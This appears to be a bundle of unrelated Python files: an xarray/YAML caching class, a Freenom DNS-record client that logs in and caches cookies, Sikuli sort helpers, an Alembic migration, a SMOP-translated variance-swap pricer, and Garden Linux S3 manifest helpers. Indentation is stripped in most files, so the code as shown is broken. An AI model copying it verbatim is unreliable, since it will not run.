ob.to_dataset(name="data"), xarray_serialization_backend
)
dump_object_fn(tgt_dir, **kwargs)
cacheable_ptrs = {}
meta_attributes = {}
for key, ob in vars(self).items():
if isinstance(ob, _Cacheable):
dest = ob.to_cache(
identifier_string=identifier_string,
overwrite=overwrite,
xarray_serialization_backend=xarray_serialization_backend,
cache_dir=cache_dir,
)
cacheable_ptrs[key] = str(dest)
elif isinstance(ob, (str, Number, bool, _Cacheable, type(None))):
meta_attributes[key] = ob
with (subdir / "meta_attributes.yml").open("w") as f:
yaml.dump(meta_attributes, f, yaml.SafeDumper)
with (subdir / "cacheable_object_pointers.yml").open("w") as f:
yaml.dump(cacheable_ptrs, f, yaml.SafeDumper)
return subdir
def load_cache(
self,
identifier_string: str = None,
overwrite: bool = True,
xarray_deserialization_backend="open_zarr",
cache_dir=None,
) -> Path:
"""load attribute objects from cache onto the existing initialized object (self)"""
if cache_dir:
cache = get_cache_directory(
cache_dir, calling_class=self.__class__.__name__
)
else:
cache = get_cache_directory(calling_class=self.__class__.__name__)
root, subdir = cache.root, cache.subdir
# now we use "subdir" as our working directory to dump this cache object
subdir /= identifier_string or self.identifier_string
log(f"loading attributes of {self} from {subdir}")
with (subdir / "xarray_object_names.yml").open("r") as f:
self_xarray_objects = yaml.load(f, yaml.SafeLoader)
with (subdir / "id.txt").open("r") as f:
if (identifier_string or self.identifier_string) != (
cached_identifier_str := f.read()
):
if not overwrite:
raise ValueError(
f"mismatch in identifier string of self ({self.identifier_string}) and "
f"cached object ({cached_identifier_str}); overwriting is disabled."
)
else:
log(
f"mismatch in identifier string of self ({self.identifier_string}) and "
f"cached object ({cached_identifier_str}); overwriting anyway."
)
kwargs = {}
for ob_name in self_xarray_objects:
tgt_dir = subdir / (ob_name + ".xr")
load_object_fn = getattr(xr, xarray_deserialization_backend)
ob = load_object_fn(tgt_dir, **kwargs)
setattr(self, ob_name, ob.data)
with (subdir / "cacheable_object_pointers.yml").open("r") as f:
cacheable_ptrs: dict = yaml.load(f, yaml.SafeLoader)
# calls `load_cache` on all attributes that are also `_Cacheable` instances
# and thus implement the `load_cache` method
for key, ptr in cacheable_ptrs.items():
try:
ob = getattr(self, key)
ob.load_cache(
identifier_string=identifier_string,
overwrite=overwrite,
xarray_deserialization_backend=xarray_deserialization_backend,
cache_dir=cache_dir,
)
except AttributeError:
log(
f"`load_cache` currently only supports loading xarray objects or initialized `_Cacheable` objects"
)
with (subdir / "meta_attributes.yml").open("r") as f:
meta_attributes: dict = yaml.load(f, yaml.SafeLoader)
for key, ob in meta_attributes.items():
setattr(self, key, ob)
# NB comment from Guido: https://github.com/python/typing/issues/58#issuecomment-194569410
@classmethod
def from_cache(
cls: typing.Callable[..., T],
identifier_string: str,
xarray_deserialization_backend="open_zarr",
cache_dir=None,
) -> T:
"""
construct an object from cache. subclasses must start with the
object returned by a call to this method like so:
ob = super().from_cache(filename)
# further implementation, such as initializing
# member classes based on metadata
return ob
"""
Duck = type(cls.__name__, (cls,), {"__init__": (lambda _: None)})
duck = Duck()
duck.load_cache(
identifier_string,
overwrite=True,
xarray_deserialization_backend=xarray_deserialization_backend,
cache_dir=cache_dir,
)
return duck
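# --- Usage sketch (illustrative only) ---
# A hedged, hypothetical round trip through the _Cacheable interface above.
# `Scores` and its attributes are invented for illustration; real subclasses
# define their own xarray attributes, and the on-disk location is resolved
# by get_cache_directory.
if __name__ == "__main__":
    class Scores(_Cacheable):
        def __init__(self, alpha: float = 1.0) -> None:
            self.alpha = alpha
            self.data = xr.DataArray([1.0, 2.0, 3.0], dims=("x",))
    ob = Scores()
    ob.to_cache()  # serialises `data` via to_zarr, plus YAML metadata files
    restored = Scores.from_cache(ob.identifier_string)  # rebuilds without calling __init__
    print(restored == ob)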
|
# -*- coding: utf-8 -*-
"""
:author: Punk Lee
:datetime: 2020/4/21 22:02
:url: https://punk_lee.gitee.io/
:copyright: ©2020 Punk Lee <[email protected]>
"""
from sys import exit
from time import sleep
from random import random
from datetime import datetime
import os, stat, pickle, atexit
from retrying import retry
from requests.utils import cookiejar_from_dict
from requests import Session, ConnectTimeout, ReadTimeout, HTTPError
from . import url
from . import parse
from .utils import print_info, print_warn, get_public_ip, match_ip_address
RETRY_COUNT = 1
RETRY_TIMES = 0
def _retry_on_exception(e):
global RETRY_COUNT
_retry = isinstance(e, (ConnectTimeout, ReadTimeout, HTTPError))
if RETRY_COUNT > RETRY_TIMES:
print_warn(f'Retry Count > {RETRY_COUNT - 1} Times. Request Aborted.')
exit()
elif not _retry:
print_warn(e)
exit()
RETRY_COUNT += 1
print_warn('Retry + 1')
return _retry
RETRY_ARGS = {
'stop_max_attempt_number': 3,
'wait_random_min': 1000,
'wait_random_max': 6000,
'retry_on_exception': _retry_on_exception
}
REQUEST_LAYER_COUNT = 0
def request_handler(func):
def decorator(self, *args, **kwargs):
"""Request Handler"""
global RETRY_COUNT
global REQUEST_LAYER_COUNT
request_method = args[0]
request_url = args[1]
print_prefix = f'│{REQUEST_LAYER_COUNT * 3 * " " + "│" if REQUEST_LAYER_COUNT else ""}'
# {DEV}
if self.dev:
# print_dev(print_prefix, '↓') # {DEV}
print(f'{print_prefix}Method:{request_method}')
print(f'{print_prefix}URL:{request_url}')
            if request_method == 'POST':
                print(f'{print_prefix}Form Data:{kwargs["data"]}')
print(print_prefix)
REQUEST_LAYER_COUNT += 1
"""Before the request"""
# Interval time
sleep(RETRY_COUNT * random())
"""CORE"""
resp = func(self, *args, **kwargs)
"""After the request"""
# {RESET} retry count
RETRY_COUNT = 1
# {SAVE} html file
self.response = resp
# {UPDATE} token
self.token = parse.token(resp)
# {CHECK} logged in
self.check_login_status(resp)
# {UPDATE} first get request
        if request_method == 'GET':
            self.first_get_request = True
REQUEST_LAYER_COUNT = 0
return resp
return decorator
class Freenom(Session):
def __init__(self, username, password, root_path=None, headers=url.HEADERS, dev=False, retry_times=3):
"""
The Script for managing Freenom.com dns records.
:param username: your username
:param password: your password
:param root_path: cache file path of the program
:param headers: Freenom.com request headers
:param retry_times: retry times of per request
:param dev: debugging mode
"""
super(Freenom, self).__init__()
self.root_path = root_path if root_path else os.getcwd()
self.__locallydata_path = os.path.join(self.root_path, '.freenomdata')
self.__dev_path = os.path.join(self.root_path, 'dev')
self.dev = dev
self.first_get_request = False
global RETRY_TIMES
RETRY_TIMES = retry_times
self.username = username
self.password = password
self.get_locally_data()
self.__response = None
self.__pub_ip = None
self.__token = ''
# Save the file before the end of the program
atexit.register(self.save_locally_data)
self.headers = headers
self.cookies = self.locally_cookies
def get_locally_data(self):
try:
f = open(f'{self.__locallydata_path}', 'rb')
self.__locally_data = pickle.load(f)
f.close()
except Exception:
# create new freenom_dns cache data file
self.__locally_data = {
'cookies': cookiejar_from_dict({}),
'domains': []
}
self.save_locally_data()
return self.__locally_data
def save_locally_data(self):
f = open(f'{self.__locallydata_path}', 'wb')
# {CACHE} Cookies
self.__locally_data['cookies'] = self.cookies
pickle.dump(self.__locally_data, f)
f.close()
@property
def locally_cookies(self):
return self.__locally_data['cookies']
@locally_cookies.setter
def locally_cookies(self, cookies):
self.__locally_data['cookies'] = cookies
@property
def locally_domains(self):
if not self.__locally_data['domains']:
self.__locally_data['domains'] = self.domains()
return self.__locally_data['domains']
@locally_domains.setter
def locally_domains(self, domains):
self.__locally_data['domains'] = domains
def locally_records(self, domain):
try:
return self.__locally_data[domain]
except Exception:
self.__locally_data[domain] = self.records(domain)
return self.__locally_data[domain]
@property
def response(self):
return self.__response
@response.setter
def response(self, resp):
if self.dev:
html_text = resp.content.decode(parse.DECODE)
# create dev folder
if not os.path.exists(self.__dev_path):
os.mkdir(self.__dev_path)
os.chmod(self.__dev_path, stat.S_IRWXU | stat.S_IRGRP | stat.S_IRWXO)
filename = datetime.now().strftime("%H_%M_%S")
with open(f'{self.__dev_path}/{filename}.html', 'w', encoding='utf-8') as f:
f.write(f'<!-- {datetime.now().strftime("%Y-%m-%d %H:%M:%S")} -->\n')
f.write(f'<!-- {html_text if html_text else "This request has no response data available."} -->\n')
self.__response = resp
@property
def pub_ip(self):
if not self.__pub_ip:
self.__pub_ip = self.get_pub_ip()
return self.__pub_ip
@pub_ip.setter
def pub_ip(self, ip):
self.__pub_ip = ip
@property
def token(self):
if not self.__token and self.response:
self.__token = parse.token(self.response)
return self.__token
@token.setter
def token(self, data):
self.__token = data
def check_login_status(self, resp):
# wrong username or password
if resp.url.find('incorrect=true') != -1:
print_warn(parse.login_msg(resp))
exit()
# do login request
        if not parse.loggedIn(resp):
            self.do_login()
@request_handler
@retry(**RETRY_ARGS)
def request(self, *args, **kwargs):
return super(Freenom, self).request(timeout=RETRY_COUNT * 10, *args, **kwargs)
@retry(**RETRY_ARGS)
def get_pub_ip(self, pub_ip_url=''):
global RETRY_COUNT
pub_ip_url = pub_ip_url if pub_ip_url else url.PUB_IPS[RETRY_COUNT - 1]
self.pub_ip = get_public_ip(pub_ip_url, timeout=RETRY_COUNT * 10)
# {RESET} retry count
RETRY_COUNT = 1
return self.pub_ip
def do_login(self):
"""Do Login..."""
        run = bool(input('Do you want to do login(y/n):').lower().count('y')) if self.dev else True
FORM_DATA = {
'token': self.token,
'username': self.username,
'password': self.password
}
# # clear old {COOKIES}
# self.cookies = cookiejar_from_dict({})
if run:
# Send a request to {LOGIN}.
self.post(url.DO_LOGIN, data=FORM_DATA)
# # {CACHE} new Cookies
# self.locally_cookies = self.cookies
def domains(self):
"""{Request} and {Update} and {Return} All Domain Data"""
self.get(url.DOMAINS)
# {CACHE} domains data
self.locally_domains = data = parse.domains_tbody_data(self.response)
return data
def show_domains(self):
"""Show All Domain"""
tbody = self.domains()
thead = parse.domains_thead_info(self.response)
if thead and tbody:
for domain in tbody:
print(f'{thead[0]} >>> {domain["domain"]}')
print(f'{thead[1]} >>> {domain["reg_date"]}')
print(f'{thead[2]} >>> {domain["exp_date"]}')
print(f'{thead[3]} >>> {domain["status"]}')
print(f'{thead[4]} >>> {domain["type"]}')
print_info('', num=32)
else:
print_info('NOTHING')
def __url_records(self, domain):
domains_data = self.locally_domains
domains = [i['domain'] for i in domains_data]
        if domain not in domains:
            print_warn('NO DATA FOUND FOR THIS DOMAIN')
            exit()
        domains_id = [i['id'] for i in domains_data]
        domains_dns_data = dict(zip(domains, domains_id))
        return url.RECORDS % (domain, domains_dns_data[domain])
def records(self, domain):
"""{Request} and {Return} All Record Data With Domain"""
self.get(self.__url_records(domain))
# {CACHE} domain records data
self.__locally_data[domain] = data = parse.records_tbody_data(self.response)
return data
def show_records(self, domain):
"""Show All Record"""
tbody = self.records(domain)
thead = parse.records_thead_info(self.response)
if thead and tbody:
for record in tbody:
print(f'{thead[0]} >>> {record["name"]}')
print(f'{thead[1]} >>> {record["type"]}')
print(f'{thead[2]} >>> {record["ttl"]}')
print(f'{thead[3]} >>> {record["target"]}')
print_info('', 32)
else:
print_info('NOTHING')
def __data_from_records(self, action, record_list):
FORM_DATA = {}
FORM_DATA['token'] = self.token
FORM_DATA['dnsaction'] = action
action_prefix = 'addrecord' if action == 'add' else 'records'
for i in range(len(record_list)):
FORM_DATA[action_prefix + f'[{i}][name]'] = record_list[i]['name']
FORM_DATA[action_prefix + f'[{i}][type]'] = record_list[i]['type']
FORM_DATA[action_prefix + f'[{i}][ttl]'] = record_list[i]['ttl']
FORM_DATA[action_prefix + f'[{i}][value]'] = record_list[i]['target']
return FORM_DATA
def __request_record(self, domain, action, record_list):
request_url = self.__url_records(domain)
# {Request} GET first
if not self.first_get_request: self.get(request_url)
# {Request} POST
self.post(request_url, data=self.__data_from_records(action, record_list))
# {PRINT} error|success info
for msg in parse.record_msg(self.response, all=True):
print_info(msg)
# {CACHE} domain records data
self.__locally_data[domain] = data = parse.records_tbody_data(self.response)
return data
def add_record(self, domain, name='', target='', type='', ttl=''):
"""{Request} and {Add} Record Data"""
record_list = [{
'name': name.upper(),
'type': type.upper() if type else 'A',
'ttl': ttl if ttl else '3600',
'target': target if target else self.pub_ip
}]
return self.__request_record(domain, 'add', record_list)
def modify_record(self, domain, name='', target='', ttl=''):
"""{Request} and {Modify} Record Data"""
record_list = []
for item in self.locally_records(domain):
            modify = item['name'] == name.upper()
record_list.append({
'name': item['name'],
'type': item['type'],
'ttl': ttl if modify and ttl else item['ttl'],
'target': (target or self.pub_ip) if modify else item['target']})
return self.__request_record(domain, 'modify', record_list)
def set_record(self, domain, name, *args, **kwargs):
"""{Request} and {Add|Modify} Record Data"""
return self.modify_record(domain, name, *args, **kwargs) \
if [i for i in self.locally_records(domain) if i['name'] == name.upper()] \
else self.add_record(domain, name, *args, **kwargs)
def set_record_list(self, domain, record_list):
"""{Request} and {Modify} a list Record Data"""
add_record_list = []
modify_record_list = []
total_record_list = [add_record_list, modify_record_list]
for record in record_list[:]:
name = record.get('name')
if name is None: continue
name = name.upper()
_record = {
'name': name,
'type': record.get('type', 'A').upper(),
'ttl': record.get('ttl', '3600'),
'target': record['target'] if record.get('target') else self.pub_ip
}
            if name not in [i['name'] for i in self.locally_records(domain)]:
add_record_list.append(_record)
modify_record_list.append(_record)
        for i, record_list in enumerate(total_record_list):
            if i and add_record_list == modify_record_list:
                # every record was new, so the 'add' request already covered them all
                record_list = []
            if record_list:
                self.__request_record(domain, 'modify' if i else 'add', record_list)
def del_record(self, domain, name, target=None, type=None, ttl=None):
"""{Request} and {Delete} Domain Record Data"""
target = match_ip_address(target) if target else None
type = type.upper() if type else None
name = name.upper()
records_data = self.locally_records(domain)
record = {}
for item in records_data:
if item['name'] == name and item['target'] == target:
record = item
break
elif item['name'] == name and item['type'] == type:
record = item
break
elif item['name'] == name and item['ttl'] == ttl:
record = item
break
elif item['name'] == name:
record = item
# if not record:
# print_warn(f'{name.lower()}.{domain} NOT FOUND')
# exit()
# {Request}
if record:
self.get(url.PREFIX + record['delete'])
else:
print_info(f'{name.lower()}.{domain} NOT FOUND')
# print error|success info
print_info(parse.record_msg(self.response))
# {CACHE} domain records data
self.__locally_data[domain] = data = parse.records_tbody_data(self.response)
return data
def clear_record(self, domain):
"""{Request} and {Clear} All Domain Record Data (USE CAUTION!!!)"""
records_data = self.locally_records(domain)
for item in records_data:
# {Request}
self.get(url.PREFIX + item['delete'])
# {CACHE} domain records data
self.__locally_data[domain] = data = parse.records_tbody_data(self.response)
if self.locally_records(domain):
print_info('Not cleared successfully')
else:
print_info('All cleared successfully')
return data
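# --- Usage sketch (illustrative only) ---
# A hedged example of the intended workflow for the Freenom client above;
# the credentials and domain are placeholders, and every call issues real
# requests against freenom.com.
if __name__ == '__main__':
    client = Freenom('[email protected]', 'password')
    client.show_domains()                   # list the domains on the account
    client.set_record('example.tk', 'www')  # add or update an A record pointing at the public IP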
|
# Copyright 2010-2011, Sikuli.org
# Released under the MIT License.
from math import sqrt
def byDistanceTo(m):
return lambda a,b: sqrt((a.x-m.x)**2+(a.y-m.y)**2) - sqrt((b.x-m.x)**2+(b.y-m.y)**2)
def byX(m):
return m.x
def byY(m):
return m.y
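# --- Usage sketch (illustrative only) ---
# byX/byY are key functions, while byDistanceTo(m) returns an old-style cmp
# function (this module targets Jython/Python 2). Assuming `matches` is a list
# of objects with .x/.y attributes and `m` is a reference match:
#
#   sorted(matches, key=byX)              # order left-to-right
#   sorted(matches, cmp=byDistanceTo(m))  # order nearest-first (Python 2 cmp)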
|
"""empty message
Revision ID: e807ed32cfe8
Revises: 4e795598fe95
Create Date: 2021-10-17 21:11:10.023516
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = 'e807ed32cfe8'
down_revision = '4e795598fe95'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('notify',
sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
sa.Column('title', sa.String(length=20), nullable=False),
sa.Column('content', sa.TEXT(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.drop_table('notice')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('notice',
sa.Column('id', mysql.INTEGER(), autoincrement=True, nullable=False),
sa.Column('title', mysql.VARCHAR(length=20), nullable=False),
sa.Column('content', mysql.TEXT(), nullable=True),
sa.PrimaryKeyConstraint('id'),
mysql_collate='utf8mb4_0900_ai_ci',
mysql_default_charset='utf8mb4',
mysql_engine='InnoDB'
)
op.drop_table('notify')
# ### end Alembic commands ###
|
# Generated with SMOP 0.41-beta
try:
from smop.libsmop import *
except ImportError:
raise ImportError('File compiled with `smop3`, please install `smop3` to run it.') from None
# Script_DV_Swap_Options.m
##################################################################
### Discrete Variance Swap / Option Pricer
##################################################################
# Description: Script to Price Discrete Variance Swap / Options under stochastic volatility models (with jumps)
# Author: Justin Kirkby
# References: (1) A General Framework for discretely sampled realized
# variance derivatives in stochastic volatility models with
# jumps, EJOR, 2017
# (2) Efficient Option Pricing By Frame Duality with The Fast
# Fourier Transform, SIAM J. Financial Math., 2015
##################################################################
folder,name,ext=fileparts(which(mfilename('fullpath')),nargout=3)
# Script_DV_Swap_Options.m:13
cd(folder)
addpath('../Helper_Functions')
addpath('./Analytical_Swaps')
###----------------------------
# Set Model/Contract Params
###----------------------------
contract=1
# Script_DV_Swap_Options.m:23
K=0.0
# Script_DV_Swap_Options.m:24
r=0.01
# Script_DV_Swap_Options.m:25
q=0
# Script_DV_Swap_Options.m:26
T=0.5
# Script_DV_Swap_Options.m:27
M=20
# Script_DV_Swap_Options.m:28
###----------------------------
# Set Numerical/Approximation Params
###----------------------------
numeric_param=cellarray([])
# Script_DV_Swap_Options.m:33
numeric_param.N = copy(2 ** 9)
# Script_DV_Swap_Options.m:34
numeric_param.m_0 = copy(40)
# Script_DV_Swap_Options.m:35
numeric_param.gamma = copy(5.5)
# Script_DV_Swap_Options.m:36
numeric_param.gridMethod = copy(4)
# Script_DV_Swap_Options.m:37
numeric_param.gridMultParam = copy(0.8)
# Script_DV_Swap_Options.m:38
L1=14
# Script_DV_Swap_Options.m:39
###========================
#### Select Stochastic Volatility Model
###========================
model=1
# Script_DV_Swap_Options.m:44
# 2 = Stein-Stein
# 3 = 3/2 Model
# 4 = 4/2 Model
# 5 = Hull White (output compares with analytical)
# 6 = Scott
# 7 = Alpha-Hypergeometric
###========================
#### Select Jump Model
###========================
jumpModel=0
# Script_DV_Swap_Options.m:55
# 1 = Normal Jumps
# 2 = Double Exponential Jumps
################################
# Jump Model Parameters
################################
jumpParams=cellarray([])
# Script_DV_Swap_Options.m:62
if jumpModel == 0:
jumpParams.Nothing = copy(0)
# Script_DV_Swap_Options.m:65
psi_J=lambda u=None: dot(0,concat([u > 0]))
# Script_DV_Swap_Options.m:66
c2Jump=0
# Script_DV_Swap_Options.m:68
c4Jump=0
# Script_DV_Swap_Options.m:69
else:
if jumpModel == 1:
lambda_=1
# Script_DV_Swap_Options.m:72
muJ=- 0.12
# Script_DV_Swap_Options.m:72
sigJ=0.15
# Script_DV_Swap_Options.m:72
jumpParams.kappa = copy(exp(muJ + dot(0.5,sigJ ** 2)) - 1)
# Script_DV_Swap_Options.m:74
jumpParams.lambda = copy(lambda_)
# Script_DV_Swap_Options.m:75
jumpParams.muJ = copy(muJ)
# Script_DV_Swap_Options.m:75
jumpParams.sigJ = copy(sigJ)
# Script_DV_Swap_Options.m:75
psi_J=lambda u=None: dot(lambda_,(exp(dot(dot(1j,u),muJ) - dot(dot(0.5,sigJ ** 2),u ** 2)) - 1))
# Script_DV_Swap_Options.m:76
c2Jump=dot(lambda_,(muJ ** 2 + sigJ ** 2))
# Script_DV_Swap_Options.m:78
c4Jump=dot(lambda_,(muJ ** 4 + dot(dot(6,sigJ ** 2),muJ ** 2) + dot(dot(3,sigJ ** 4),lambda_)))
# Script_DV_Swap_Options.m:79
else:
if jumpModel == 2:
lambda_=1
# Script_DV_Swap_Options.m:82
p_up=0.5
# Script_DV_Swap_Options.m:83
eta1=25
# Script_DV_Swap_Options.m:84
eta2=30
# Script_DV_Swap_Options.m:85
kappa=dot(p_up,eta1) / (eta1 - 1) + dot((1 - p_up),eta2) / (eta2 + 1) - 1
# Script_DV_Swap_Options.m:87
jumpParams.lambda = copy(lambda_)
# Script_DV_Swap_Options.m:88
jumpParams.kappa = copy(kappa)
# Script_DV_Swap_Options.m:88
jumpParams.eta1 = copy(eta1)
# Script_DV_Swap_Options.m:88
jumpParams.eta2 = copy(eta2)
# Script_DV_Swap_Options.m:88
jumpParams.p_up = copy(p_up)
# Script_DV_Swap_Options.m:88
psi_J=lambda u=None: dot(lambda_,(dot(p_up,eta1) / (eta1 - dot(1j,u)) + dot((1 - p_up),eta2) / (eta2 + dot(1j,u)) - 1))
# Script_DV_Swap_Options.m:89
c2Jump=dot(dot(2,lambda_),p_up) / eta1 ** 2 + dot(dot(2,lambda_),(1 - p_up)) / eta2 ** 2
# Script_DV_Swap_Options.m:91
c4Jump=dot(dot(24,lambda_),(p_up / eta1 ** 4 + (1 - p_up) / eta2 ** 4))
# Script_DV_Swap_Options.m:92
################################################
#### Set the Stochastic Volatility Model Component
################################################
if model == 1:
###==============================
### HESTON MODEL Parameters
###==============================
modparam.eta = copy(3.99)
# Script_DV_Swap_Options.m:103
modparam.theta = copy(0.014)
# Script_DV_Swap_Options.m:104
modparam.rho = copy(- 0.79)
# Script_DV_Swap_Options.m:105
modparam.Sigmav = copy(0.27)
# Script_DV_Swap_Options.m:106
modparam.v0 = copy((0.0994) ** 2)
# Script_DV_Swap_Options.m:107
else:
if model == 2:
###=============================================================
### STEIN-STEIN MODEL Parameters
###=============================================================
modparam.eta = copy(2)
# Script_DV_Swap_Options.m:113
modparam.theta = copy(0.18)
# Script_DV_Swap_Options.m:114
modparam.Sigmav = copy(0.18)
# Script_DV_Swap_Options.m:115
modparam.v0 = copy(0.22)
# Script_DV_Swap_Options.m:116
modparam.rho = copy(- 0.5)
# Script_DV_Swap_Options.m:117
else:
if model == 3:
###=============================================================
### 3/2 MODEL Parameters
###=============================================================
modparam.Sigmav = copy(0.1)
# Script_DV_Swap_Options.m:123
modparam.eta = copy(3)
# Script_DV_Swap_Options.m:124
modparam.rho = copy(- 0.7)
# Script_DV_Swap_Options.m:125
modparam.theta = copy(0.04)
# Script_DV_Swap_Options.m:126
modparam.v0 = copy(0.04)
# Script_DV_Swap_Options.m:127
else:
if model == 4:
###=============================================================
### 4/2 MODEL Parameters
###=============================================================
modparam.eta = copy(3)
# Script_DV_Swap_Options.m:133
modparam.theta = copy(0.04)
# Script_DV_Swap_Options.m:134
modparam.rho = copy(- 0.7)
# Script_DV_Swap_Options.m:135
modparam.Sigmav = copy(0.25)
# Script_DV_Swap_Options.m:136
modparam.v0 = copy(0.04)
# Script_DV_Swap_Options.m:137
modparam.aa = copy(0.5)
# Script_DV_Swap_Options.m:138
modparam.bb = copy(dot(0.5,modparam.v0))
# Script_DV_Swap_Options.m:139
else:
if model == 5:
###=============================================================
### HULL-WHITE MODEL Parameters
###=============================================================
modparam.av = copy(0.05)
# Script_DV_Swap_Options.m:145
modparam.rho = copy(- 0.6)
# Script_DV_Swap_Options.m:146
modparam.Sigmav = copy(0.6)
# Script_DV_Swap_Options.m:147
modparam.v0 = copy(0.03)
# Script_DV_Swap_Options.m:148
else:
if model == 6:
###=============================================================
### SCOTT MODEL Parameters
###=============================================================
modparam.eta = copy(2)
# Script_DV_Swap_Options.m:154
modparam.theta = copy(log(0.16))
# Script_DV_Swap_Options.m:155
modparam.Sigmav = copy(0.2)
# Script_DV_Swap_Options.m:156
modparam.v0 = copy(log(0.18))
# Script_DV_Swap_Options.m:157
modparam.rho = copy(- 0.9)
# Script_DV_Swap_Options.m:158
else:
if model == 7:
###=============================================================
### ALPHA-HYPERGEOMETRIC MODEL Parameters
###=============================================================
modparam.rho = copy(- 0.9)
# Script_DV_Swap_Options.m:164
modparam.Sigmav = copy(0.2)
# Script_DV_Swap_Options.m:165
modparam.v0 = copy(log(0.17))
# Script_DV_Swap_Options.m:166
modparam.eta = copy(0.05)
# Script_DV_Swap_Options.m:167
modparam.theta = copy(0.2)
# Script_DV_Swap_Options.m:168
modparam.av = copy(0.03)
# Script_DV_Swap_Options.m:169
##############################################################
# PRICE CONTRACT
##############################################################
#density projection grid on [-alpha,alpha]
numeric_param.alph = copy(GetAlph_DisreteVariance(c2Jump,c4Jump,model,modparam,T,L1))
# Script_DV_Swap_Options.m:177
PROJ_Price=PROJ_DiscreteVariance_StochVol(numeric_param,M,r,T,K,psi_J,model,modparam,contract)
# Script_DV_Swap_Options.m:179
fprintf('PROJ Price: %.8f \n',PROJ_Price)
### In the special cases where analytic prices are known, also print the error
if model == 1 and jumpModel == 0 and contract == 1:
ref,KcH=hestonfairstrike(r,modparam.v0,modparam.theta,modparam.eta,modparam.Sigmav,T,modparam.rho,M,nargout=2)
# Script_DV_Swap_Options.m:184
fprintf('Analytical Price: %.8f \n',ref)
fprintf('Error: %.3e \n',PROJ_Price - ref)
else:
if model == 5 and jumpModel == 0 and contract == 1:
ref,KcH=hullwhitefairstrike(r,modparam.v0,modparam.Sigmav,modparam.av,T,modparam.rho,M,nargout=2)
# Script_DV_Swap_Options.m:189
Error1=PROJ_Price - ref
# Script_DV_Swap_Options.m:190
fprintf('Analytical Price: %.8f \n',ref)
fprintf('Error: %.3e \n',PROJ_Price - ref)
|
import concurrent.futures
import dataclasses
import enum
import faulthandler
import functools
import io
import logging
import logging.config
import os
import pprint
import typing
import botocore.client
import botocore.exceptions
import dacite
import yaml
import glci.model
import paths
GardenlinuxFlavourSet = glci.model.GardenlinuxFlavourSet
GardenlinuxFlavour = glci.model.GardenlinuxFlavour
GardenlinuxFlavourCombination = glci.model.GardenlinuxFlavourCombination
Architecture = glci.model.Architecture
CicdCfg = glci.model.CicdCfg
def configure_logging():
faulthandler.enable()
cfg = {
'version': 1,
'formatters': {
'default': {
'format': '%(asctime)s [%(levelname)s] %(name)s: %(message)s',
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'default',
'level': logging.INFO,
'stream': 'ext://sys.stdout',
},
},
'root': {
'level': logging.DEBUG,
'handlers': ['console',],
},
'loggers': {
'googleapiclient.discovery_cache': {
'level': logging.ERROR,
},
},
}
logging.config.dictConfig(cfg)
def cicd_cfg(
cfg_name: str='default',
cfg_file=paths.cicd_cfg_path,
) -> CicdCfg:
with open(cfg_file) as f:
parsed = yaml.safe_load(f)
for raw in parsed['cicd_cfgs']:
cfg = dacite.from_dict(
data_class=CicdCfg,
data=raw,
)
if cfg.name == cfg_name:
return cfg
else:
raise ValueError(f'not found: {cfg_name=}')
def flavour_sets(
build_yaml: str=paths.flavour_cfg_path,
) -> typing.List[GardenlinuxFlavourSet]:
with open(build_yaml) as f:
parsed = yaml.safe_load(f)
flavour_sets = [
dacite.from_dict(
data_class=GardenlinuxFlavourSet,
data=flavour_set,
config=dacite.Config(
cast=[Architecture, typing.Tuple]
)
) for flavour_set in parsed['flavour_sets']
]
return flavour_sets
def flavour_set(
flavour_set_name: str,
build_yaml: str=paths.flavour_cfg_path,
):
for fs in flavour_sets(build_yaml=build_yaml):
if fs.name == flavour_set_name:
return fs
else:
        raise RuntimeError(f'not found: {flavour_set_name=}')
def release_manifest(
s3_client: 'botocore.client.S3',
bucket_name: str,
key: str,
absent_ok: bool=False,
) -> glci.model.OnlineReleaseManifest:
'''
retrieves and deserialises a gardenlinux release manifest from the specified s3 object
(expects a YAML or JSON document)
'''
buf = io.BytesIO()
try:
s3_client.download_fileobj(
Bucket=bucket_name,
Key=key,
Fileobj=buf,
)
except botocore.exceptions.ClientError as e:
if absent_ok and str(e.response['Error']['Code']) == '404':
return None
raise e
buf.seek(0)
parsed = yaml.safe_load(buf)
# patch-in transient attrs
parsed['s3_key'] = key
parsed['s3_bucket'] = bucket_name
manifest = dacite.from_dict(
data_class=glci.model.OnlineReleaseManifest,
data=parsed,
config=dacite.Config(
cast=[
glci.model.Architecture,
typing.Tuple
],
),
)
return manifest
def release_manifest_set(
s3_client: 'botocore.client.S3',
bucket_name: str,
manifest_key: str,
absent_ok: bool=False,
) -> glci.model.ReleaseManifestSet:
buf = io.BytesIO()
try:
s3_client.download_fileobj(
Bucket=bucket_name,
Key=manifest_key,
Fileobj=buf,
)
except botocore.exceptions.ClientError as e:
if absent_ok and str(e.response['Error']['Code']) == '404':
return None
raise e
buf.seek(0)
parsed = yaml.safe_load(buf)
print(manifest_key)
manifest = dacite.from_dict(
data_class=glci.model.ReleaseManifestSet,
data=parsed,
config=dacite.Config(
cast=[
glci.model.Architecture,
typing.Tuple
],
),
)
return manifest
def _json_serialisable_manifest(manifest: glci.model.ReleaseManifest):
# workaround: need to convert enums to str
patch_args = {
attr: val.value for attr, val in manifest.__dict__.items()
if isinstance(val, enum.Enum)
}
manifest = dataclasses.replace(manifest, **patch_args)
return manifest
def upload_release_manifest(
s3_client: 'botocore.client.S3',
bucket_name: str,
key: str,
manifest: glci.model.ReleaseManifest,
):
manifest = _json_serialisable_manifest(manifest=manifest)
manifest_bytes = yaml.safe_dump(dataclasses.asdict(manifest)).encode('utf-8')
manifest_fobj = io.BytesIO(initial_bytes=manifest_bytes)
return s3_client.upload_fileobj(
Fileobj=manifest_fobj,
Bucket=bucket_name,
Key=key,
ExtraArgs={
'ContentType': 'text/yaml',
'ContentEncoding': 'utf-8',
},
)
def upload_release_manifest_set(
s3_client: 'botocore.client.S3',
bucket_name: str,
key: str,
manifest_set: glci.model.ReleaseManifestSet,
):
manifests = [_json_serialisable_manifest(m) for m in manifest_set.manifests]
manifest_set = dataclasses.replace(manifest_set, manifests=manifests)
manifest_set_bytes = yaml.safe_dump(dataclasses.asdict(manifest_set)).encode('utf-8')
manifest_set_fobj = io.BytesIO(initial_bytes=manifest_set_bytes)
